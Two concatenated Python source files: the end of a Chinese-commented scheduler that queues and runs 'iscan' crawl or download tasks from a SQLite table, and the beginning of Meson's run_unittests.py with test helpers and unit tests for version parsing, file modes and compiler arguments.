# ----------------------------------------------上面的判断为任务是否在有效时间
# if len(cmd.stratagy.period) == 0:
# return is_effective
# for t_p in cmd.stratagy.period:
# t_p_list = t_p.split("-")
# if (
# datetime.strptime(t_p_list[0], "%H:%M:%S").time()
# <= now_time
# <= datetime.strptime(t_p_list[1], "%H:%M:%S").time()
# ):
# is_effective = True
# break
# else:
# is_effective = False
# ---------------------------------------------上面为判断任务是否在执行时间内
except:
self._logger.error(
f"Determine the effective and execution time of the task error, err:{traceback.format_exc()}"
)
return is_effective
def _get_new_iscantask(self):
"""
目前先不考虑设置,不太清楚需不需要做循环下载
:return:
"""
new_task_list = []
result_list = []
try:
with self._dealing_queue_locker:
new_task = self._sqlfunc.query_iscan_task(
SqlConditions(
SqlCondition(
colname="taskstatus",
val=ETaskStatus.New.value,
comb=ESqlComb.Or,
),
SqlCondition(
colname="taskstatus",
val=ETaskStatus.WaitForDeal.value,
comb=ESqlComb.Or,
),
# SqlCondition(
# colname='taskstatus',
# val=ETaskStatus.Logining.value,
# comb=ESqlComb.Or),
SqlCondition(
colname="taskstatus",
val=ETaskStatus.Downloading.value,
comb=ESqlComb.Or,
),
)
)
if len(new_task) > 0:
for t_a in new_task:
# 检查任务是否在执行时间内,任务的有效时间和任务的执行时间段
if self._process_task_execution_time(t_a):
new_task_list.append(t_a)
else:
try:
pause_task = self._construct_task(t_a)
if pause_task.cmd.switch_control.download_switch == 0:
# 如果是被暂停的任务那么就开始
self._sqlfunc.update_iscan_status(
"taskstatus",
ETaskStatus.TemporarilyStop.value,
pause_task.taskid,
)
self._sqlfunc.update_iscan_status(
"sequence",
pause_task._sequence,
pause_task.taskid,
)
self.write_iscanback(
pause_task, ECommandStatus.Cancelled, "任务已经被暂停"
)
self._logger.info(
f"Mission suspended successfully, taskid:{pause_task.taskid}"
)
continue
except Exception:
self._logger.error(
"Construct task from dict error: {}".format(
traceback.format_exc()
)
)
for dic in new_task_list:
if not isinstance(dic, dict):
continue
# 构造Task
task: IscanTask = None
try:
task = self._construct_task(dic)
except Exception:
self._logger.error(
"Construct task from dict error: {}".format(
traceback.format_exc()
)
)
if not isinstance(task, IscanTask):
continue
# 校验Task
if not isinstance(task.taskid, str) or task.taskid == "":
continue
# 满足下载条件后立即开始查询重复
if self._dealing_queue.__contains__(task.taskid):
continue
# 修改任务状态为正在处理到队列
task.taskstatus = ETaskStatus.WaitForDeal
# 修改数据库中的任务状态
self._sqlfunc.update_iscan_status(
"taskstatus", task.taskstatus.value, task.taskid
)
# 唯一的任务放到去重字典里
self._dealing_queue[task.taskid] = task
result_list.append(task)
except:
self._logger.error(
f"Select executable iscan tasks error, err:{traceback.format_exc()}"
)
return result_list
def _construct_task(self, filedata: dict) -> IscanTask:
"""
构造dict构造iscantask
:param filedata:
:return:
"""
tsk: IscanTask = IscanTask(filedata)
tsk.priority = tsk.cmd.stratagy.priority
tsk.on_complete = self.on_task_complete
return tsk
def _put_task_to_queue(self, tsk: IscanTask, queue: PriorityQueue):
"""
将任务放进队列的通用方法
:param tsk:
:param queue:
:return:
"""
if not isinstance(tsk, IscanTask):
raise Exception("Invalid Task")
# 同时进行的最大的下载任务数,优先级高的任务直接处理
# 正在下载的任务可能需要很久,所以每次sleep5秒即可
queue.put(tsk)
self.write_iscanback(tsk, ECommandStatus.Dealing, "任务加入下载队列成功,等待执行")
self._logger.debug(f"Put an iscan task to queue\ntaskid:{tsk.taskid}")
return
def put_new_iscantask(self):
"""
将新的iscantask放入队列
:return:
"""
while True:
new_tasks = self._get_new_iscantask()
if len(new_tasks) == 0:
# 3秒钟扫描一次数据库
time.sleep(1)
continue
try:
for filedata in new_tasks:
self._put_task_to_queue(filedata, self._new_scantask_queue)
except:
self._logger.error(
f"Make the task from sqlite wrong, err:{traceback.format_exc()}"
)
finally:
# 因为有循环任务所以5秒扫描一次
# 毛线...不能去重啊
time.sleep(0.5)
def execute_new_iscantask(self):
"""
不断的从新任务中取出任务,下载数据
:return:
"""
got = False
while True:
if self._new_scantask_queue.empty():
time.sleep(1)
continue
got = False
tsk: IscanTask = self._new_scantask_queue.get()
got = True
self._logger.info(
f"Task start: {tsk.taskid}, scantype:{tsk.scantype.value}"
)
try:
# 根据cmd中的设置访问网站,爬取不同的数据
self._scan_plug_manger.iscandownload(tsk)
except:
self._logger.error(
f"Execute iscantask error, err:{traceback.format_exc()}"
)
finally:
if got:
self._new_scantask_queue.task_done()
def start(self):
"""
多线程开启任务执行
:return:
"""
thread1 = threading.Thread(target=self.put_new_iscantask, name="iscantaskscan")
thread2 = threading.Thread(
target=self.execute_new_iscantask, name="iscantaskexecute"
)
thread1.start()
thread2.start()
|
run_unittests.py
|
#!/usr/bin/env python3
# Copyright 2016-2017 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import typing as T
import stat
import subprocess
import re
import json
import tempfile
import textwrap
import os
import shutil
import sys
import unittest
import platform
import pickle
import functools
import io
import operator
import threading
import urllib.error
import urllib.request
import zipfile
import hashlib
from itertools import chain
from unittest import mock
from configparser import ConfigParser
from contextlib import contextmanager
from glob import glob
from pathlib import (PurePath, Path)
from distutils.dir_util import copy_tree
import typing as T
import mesonbuild.mlog
import mesonbuild.depfile
import mesonbuild.dependencies.base
import mesonbuild.compilers
import mesonbuild.envconfig
import mesonbuild.environment
import mesonbuild.mesonlib
import mesonbuild.coredata
import mesonbuild.modules.gnome
from mesonbuild.interpreter import Interpreter, ObjectHolder
from mesonbuild.ast import AstInterpreter
from mesonbuild.mesonlib import (
BuildDirLock, LibType, MachineChoice, PerMachine, Version, is_windows,
is_osx, is_cygwin, is_dragonflybsd, is_openbsd, is_haiku, is_sunos,
windows_proof_rmtree, python_command, version_compare, split_args,
quote_arg, relpath, is_linux
)
from mesonbuild.environment import detect_ninja
from mesonbuild.mesonlib import MesonException, EnvironmentException
from mesonbuild.dependencies import PkgConfigDependency, ExternalProgram
import mesonbuild.dependencies.base
from mesonbuild.build import Target, ConfigurationData
import mesonbuild.modules.pkgconfig
from mesonbuild.mtest import TAPParser, TestResult
from run_tests import (
Backend, FakeBuild, FakeCompilerOptions,
ensure_backend_detects_changes, exe_suffix, get_backend_commands,
get_builddir_target_args, get_fake_env, get_fake_options, get_meson_script,
run_configure_inprocess, run_mtest_inprocess
)
URLOPEN_TIMEOUT = 5
@contextmanager
def chdir(path: str):
curdir = os.getcwd()
os.chdir(path)
yield
os.chdir(curdir)
def get_dynamic_section_entry(fname, entry):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF platforms')
try:
raw_out = subprocess.check_output(['readelf', '-d', fname],
universal_newlines=True)
except FileNotFoundError:
# FIXME: Try using depfixer.py:Elf() as a fallback
raise unittest.SkipTest('readelf not found')
pattern = re.compile(entry + r': \[(.*?)\]')
for line in raw_out.split('\n'):
m = pattern.search(line)
if m is not None:
return m.group(1)
return None # The file did not contain the specified entry.
def get_soname(fname):
return get_dynamic_section_entry(fname, 'soname')
def get_rpath(fname):
return get_dynamic_section_entry(fname, r'(?:rpath|runpath)')
def is_tarball():
if not os.path.isdir('docs'):
return True
return False
def is_ci():
if 'CI' in os.environ:
return True
return False
def is_pull():
# Travis
if os.environ.get('TRAVIS_PULL_REQUEST', 'false') != 'false':
return True
# Azure
if 'SYSTEM_PULLREQUEST_ISFORK' in os.environ:
return True
return False
def _git_init(project_dir):
subprocess.check_call(['git', 'init'], cwd=project_dir, stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'config',
'user.name', 'Author Person'], cwd=project_dir)
subprocess.check_call(['git', 'config',
'user.email', 'teh_coderz@example.com'], cwd=project_dir)
subprocess.check_call('git add *', cwd=project_dir, shell=True,
stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'commit', '-a', '-m', 'I am a project'], cwd=project_dir,
stdout=subprocess.DEVNULL)
@functools.lru_cache()
def is_real_gnu_compiler(path):
'''
Check if the gcc we have is a real gcc and not a macOS wrapper around clang
'''
if not path:
return False
out = subprocess.check_output([path, '--version'], universal_newlines=True, stderr=subprocess.STDOUT)
return 'Free Software Foundation' in out
def skipIfNoExecutable(exename):
'''
Skip this test if the given executable is not found.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if shutil.which(exename) is None:
raise unittest.SkipTest(exename + ' not found')
return func(*args, **kwargs)
return wrapped
return wrapper
def skipIfNoPkgconfig(f):
'''
Skip this test if no pkg-config is found, unless we're on CI.
This allows users to run our test suite without having
pkg-config installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
Note: Yes, we provide pkg-config even while running Windows CI
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
return f(*args, **kwargs)
return wrapped
def skipIfNoPkgconfigDep(depname):
'''
Skip this test if the given pkg-config dep is not found, unless we're on CI.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
if not is_ci() and subprocess.call(['pkg-config', '--exists', depname]) != 0:
raise unittest.SkipTest('pkg-config dependency {} not found.'.format(depname))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_no_cmake(f):
'''
Skip this test if no cmake is found, unless we're on CI.
This allows users to run our test suite without having
cmake installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('cmake') is None:
raise unittest.SkipTest('cmake not found')
return f(*args, **kwargs)
return wrapped
def skip_if_not_language(lang):
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
try:
env = get_fake_env()
f = getattr(env, 'detect_{}_compiler'.format(lang))
f(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('No {} compiler found.'.format(lang))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_env_set(key):
'''
Skip a test if a particular env is set, except when running under CI
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
old = None
if key in os.environ:
if not is_ci():
raise unittest.SkipTest('Env var {!r} set, skipping'.format(key))
old = os.environ.pop(key)
try:
return func(*args, **kwargs)
finally:
if old is not None:
os.environ[key] = old
return wrapped
return wrapper
def skip_if_not_base_option(feature):
"""Skip tests if The compiler does not support a given base option.
for example, ICC doesn't currently support b_sanitize.
"""
def actual(f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if feature not in cc.base_options:
raise unittest.SkipTest(
'{} not available with {}'.format(feature, cc.id))
return f(*args, **kwargs)
return wrapped
return actual
@contextmanager
def temp_filename():
'''A context manager which provides a filename to an empty temporary file.
On exit the file will be deleted.
'''
fd, filename = tempfile.mkstemp()
os.close(fd)
try:
yield filename
finally:
try:
os.remove(filename)
except OSError:
pass
@contextmanager
def no_pkgconfig():
'''
A context manager that overrides shutil.which and ExternalProgram to force
them to return None for pkg-config to simulate it not existing.
'''
old_which = shutil.which
old_search = ExternalProgram._search
def new_search(self, name, search_dir):
if name == 'pkg-config':
return [None]
return old_search(self, name, search_dir)
def new_which(cmd, *kwargs):
if cmd == 'pkg-config':
return None
return old_which(cmd, *kwargs)
shutil.which = new_which
ExternalProgram._search = new_search
try:
yield
finally:
shutil.which = old_which
ExternalProgram._search = old_search
class InternalTests(unittest.TestCase):
def test_version_number(self):
searchfunc = mesonbuild.environment.search_version
self.assertEqual(searchfunc('foobar 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.128'), '2016.10.128')
self.assertEqual(searchfunc('2016.10.128'), '2016.10.128')
self.assertEqual(searchfunc('2016.10'), '2016.10')
self.assertEqual(searchfunc('2016.10 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('oops v1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.oops 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.x'), 'unknown version')
def test_mode_symbolic_to_bits(self):
modefunc = mesonbuild.mesonlib.FileMode.perms_s_to_bits
self.assertEqual(modefunc('---------'), 0)
self.assertEqual(modefunc('r--------'), stat.S_IRUSR)
self.assertEqual(modefunc('---r-----'), stat.S_IRGRP)
self.assertEqual(modefunc('------r--'), stat.S_IROTH)
self.assertEqual(modefunc('-w-------'), stat.S_IWUSR)
self.assertEqual(modefunc('----w----'), stat.S_IWGRP)
self.assertEqual(modefunc('-------w-'), stat.S_IWOTH)
self.assertEqual(modefunc('--x------'), stat.S_IXUSR)
self.assertEqual(modefunc('-----x---'), stat.S_IXGRP)
self.assertEqual(modefunc('--------x'), stat.S_IXOTH)
self.assertEqual(modefunc('--S------'), stat.S_ISUID)
self.assertEqual(modefunc('-----S---'), stat.S_ISGID)
self.assertEqual(modefunc('--------T'), stat.S_ISVTX)
self.assertEqual(modefunc('--s------'), stat.S_ISUID | stat.S_IXUSR)
self.assertEqual(modefunc('-----s---'), stat.S_ISGID | stat.S_IXGRP)
self.assertEqual(modefunc('--------t'), stat.S_ISVTX | stat.S_IXOTH)
self.assertEqual(modefunc('rwx------'), stat.S_IRWXU)
self.assertEqual(modefunc('---rwx---'), stat.S_IRWXG)
self.assertEqual(modefunc('------rwx'), stat.S_IRWXO)
# We could keep listing combinations exhaustively but that seems
# tedious and pointless. Just test a few more.
self.assertEqual(modefunc('rwxr-xr-x'),
stat.S_IRWXU |
stat.S_IRGRP | stat.S_IXGRP |
stat.S_IROTH | stat.S_IXOTH)
self.assertEqual(modefunc('rw-r--r--'),
stat.S_IRUSR | stat.S_IWUSR |
stat.S_IRGRP |
stat.S_IROTH)
self.assertEqual(modefunc('rwsr-x---'),
stat.S_IRWXU | stat.S_ISUID |
stat.S_IRGRP | stat.S_IXGRP)
def test_compiler_args_class_none_flush(self):
cc = mesonbuild.compilers.CCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock())
a = cc.compiler_args(['-I.'])
#first we are checking if the tree construction deduplicates the correct -I argument
a += ['-I..']
a += ['-I./tests/']
a += ['-I./tests2/']
#think this here as assertion, we cannot apply it, otherwise the CompilerArgs would already flush the changes:
# assertEqual(a, ['-I.', '-I./tests2/', '-I./tests/', '-I..', '-I.'])
a += ['-I.']
a += ['-I.', '-I./tests/']
self.assertEqual(a, ['-I.', '-I./tests/', '-I./tests2/', '-I..'])
#then we are checking that when CompilerArgs already have a build container list, that the deduplication is taking the correct one
a += ['-I.', '-I./tests2/']
self.assertEqual(a, ['-I.', '-I./tests2/', '-I./tests/', '-I..'])
def test_compiler_args_class(self):
cc = mesonbuild.compilers.CCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock())
# Test that empty initialization works
a = cc.compiler_args()
self.assertEqual(a, [])
# Test that list initialization works
a = cc.compiler_args(['-I.', '-I..'])
self.assertEqual(a, ['-I.', '-I..'])
# Test that there is no de-dup on initialization
self.assertEqual(cc.compiler_args(['-I.', '-I.']), ['-I.', '-I.'])
## Test that appending works
a.append('-I..')
self.assertEqual(a, ['-I..', '-I.'])
a.append('-O3')
self.assertEqual(a, ['-I..', '-I.', '-O3'])
## Test that in-place addition works
a += ['-O2', '-O2']
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2', '-O2'])
# Test that removal works
a.remove('-O2')
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2'])
# Test that de-dup happens on addition
a += ['-Ifoo', '-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# .extend() is just +=, so we don't test it
## Test that addition works
# Test that adding a list with just one old arg works and yields the same array
a = a + ['-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# Test that adding a list with one arg new and one old works
a = a + ['-Ifoo', '-Ibaz']
self.assertEqual(a, ['-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2'])
# Test that adding args that must be prepended and appended works
a = a + ['-Ibar', '-Wall']
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
## Test that reflected addition works
# Test that adding to a list with just one old arg works and yields the same array
a = ['-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
# Test that adding to a list with just one new arg that is not pre-pended works
a = ['-Werror'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with two new args preserves the order
a = ['-Ldir', '-Lbah'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with old args does nothing
a = ['-Ibar', '-Ibaz', '-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
## Test that adding libraries works
l = cc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Adding a library and a libpath appends both correctly
l += ['-Lbardir', '-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
# Adding the same library again does nothing
l += ['-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
## Test that 'direct' append and extend works
l = cc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
def test_compiler_args_class_gnuld(self):
## Test --start/end-group
linker = mesonbuild.linkers.GnuDynamicLinker([], MachineChoice.HOST, 'fake', '-Wl,', [])
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = gcc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-Wl,--end-group'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '-Wl,--end-group'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding a non-library argument doesn't include it in the group
l += ['-Lfoo', '-Wl,--export-dynamic']
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group', '-Wl,--export-dynamic'])
# -Wl,-lfoo is detected as a library and gets added to the group
l.append('-Wl,-ldl')
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--export-dynamic', '-Wl,-ldl', '-Wl,--end-group'])
def test_compiler_args_remove_system(self):
## Test --start/end-group
linker = mesonbuild.linkers.GnuDynamicLinker([], MachineChoice.HOST, 'fake', '-Wl,', [])
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = gcc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
## Test that to_native removes all system includes
l += ['-isystem/usr/include', '-isystem=/usr/share/include', '-DSOMETHING_IMPORTANT=1', '-isystem', '/usr/local/include']
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group', '-DSOMETHING_IMPORTANT=1'])
def test_string_templates_substitution(self):
dictfunc = mesonbuild.mesonlib.get_filenames_templates_dict
substfunc = mesonbuild.mesonlib.substitute_values
ME = mesonbuild.mesonlib.MesonException
# Identity
self.assertEqual(dictfunc([], []), {})
# One input, no outputs
inputs = ['bar/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + [d['@PLAINNAME@'] + '.ok'] + cmd[2:])
cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
# One input, one output
inputs = ['bar/foo.c.in']
outputs = ['out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': '.'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@.out', '@OUTPUT@', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + outputs + cmd[2:])
cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', '@OUTPUT0@']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out', d['@PLAINNAME@'] + '.ok'] + outputs)
cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
# One input, one output with a subdir
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Two inputs, no outputs
inputs = ['bar/foo.c.in', 'baz/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1]}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[1:])
cmd = ['@INPUT0@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@INPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
cmd = ['@INPUT0@', '@INPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Too many inputs
cmd = ['@PLAINNAME@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@BASENAME@']
self.assertRaises(ME, substfunc, cmd, d)
# No outputs
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTPUT0@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTDIR@']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, one output
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out'] + cmd[1:])
cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, two outputs
outputs = ['dir/out.c', 'dir/out2.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTPUT1@': outputs[1],
'@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT0@', '@OUTPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[2:])
cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', '@OUTDIR@']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok', 'dir'])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Many outputs, can't use @OUTPUT@ like this
cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
def test_needs_exe_wrapper_override(self):
config = ConfigParser()
config['binaries'] = {
'c': '\'/usr/bin/gcc\'',
}
config['host_machine'] = {
'system': '\'linux\'',
'cpu_family': '\'arm\'',
'cpu': '\'armv7\'',
'endian': '\'little\'',
}
# Can not be used as context manager because we need to
# open it a second time and this is not possible on
# Windows.
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.flush()
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
detected_value = env.need_exe_wrapper()
os.unlink(configfilename)
desired_value = not detected_value
config['properties'] = {
'needs_exe_wrapper': 'true' if desired_value else 'false'
}
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
forced_value = env.need_exe_wrapper()
os.unlink(configfilename)
